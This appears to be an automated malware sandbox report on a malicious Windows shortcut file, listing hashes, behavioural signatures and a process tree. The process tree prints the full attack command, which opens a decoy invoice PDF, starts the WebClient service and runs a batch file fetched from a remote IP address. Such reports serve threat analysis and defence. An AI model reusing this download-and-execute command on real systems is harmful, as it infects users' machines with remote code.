Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
08/05/2024, 07:42
Static task
static1
Behavioral task
behavioral1
Sample
Condition-Agreement_2024_05_06_27.lnk
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Condition-Agreement_2024_05_06_27.lnk
Resource
win10v2004-20240426-en
General
-
Target
Condition-Agreement_2024_05_06_27.lnk
-
Size
2KB
-
MD5
a497662f623efb41bcf7c05b6571edfe
-
SHA1
c1b3a6927f8032d0052ff9a118c16e55a9f97dea
-
SHA256
132f8d12421381a77b9d164a90c155b05c9f57fd3a2e79a5a2a50c183b8bb4e5
-
SHA512
d955dda82d9349aeceb27d29ed09816d9773cff050abdbcd928d66b1532c1adc4c0f454a8c027b67fa13e8157674a1edacff884ccd35f4b4652cf5241d12a1a3
Malware Config
Signatures
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2044 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2440 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2476 AcroRd32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2476 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2476 AcroRd32.exe 2476 AcroRd32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2744 wrote to memory of 2932 2744 cmd.exe 29 PID 2744 wrote to memory of 2932 2744 cmd.exe 29 PID 2744 wrote to memory of 2932 2744 cmd.exe 29 PID 2932 wrote to memory of 2476 2932 cmd.exe 30 PID 2932 wrote to memory of 2476 2932 cmd.exe 30 PID 2932 wrote to memory of 2476 2932 cmd.exe 30 PID 2932 wrote to memory of 2476 2932 cmd.exe 30 PID 2932 wrote to memory of 2044 2932 cmd.exe 31 PID 2932 wrote to memory of 2044 2932 cmd.exe 31 PID 2932 wrote to memory of 2044 2932 cmd.exe 31 PID 2932 wrote to memory of 2440 2932 cmd.exe 32 PID 2932 wrote to memory of 2440 2932 cmd.exe 32 PID 2932 wrote to memory of 2440 2932 cmd.exe 32 PID 2932 wrote to memory of 1460 2932 cmd.exe 34 PID 2932 wrote to memory of 1460 2932 cmd.exe 34 PID 2932 wrote to memory of 1460 2932 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Condition-Agreement_2024_05_06_27.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2476
-
-
C:\Windows\system32\sc.exesc start webclient3⤵
- Launches sc.exe
PID:2044
-
-
C:\Windows\system32\PING.EXEping localhost -n 73⤵
- Runs ping.exe
PID:2440
-
-
C:\Windows\system32\cmd.execmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat3⤵PID:1460
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD551468201884927ab944df694045be2ca
SHA15d24a941358bdda5150c4cef8f624c240615e366
SHA256a8a3800c94efc05ca45b3d919d2c1930427bc41e23ab4a99864895ca57c54c19
SHA512ea93371ac98ac8dc9ad57586b759f78738ac535cfc2b4ebde9f448bfd3dd92aaaa36d55aa327cb21ce6b0af22715c655b64a692e4be0b19da53bb05e502c9b06
-
Filesize
29B
MD5823a9caa296579d6a40cd5195d969727
SHA15592813787ecff9133229439498d624339c07ece
SHA25660b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
SHA51277ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc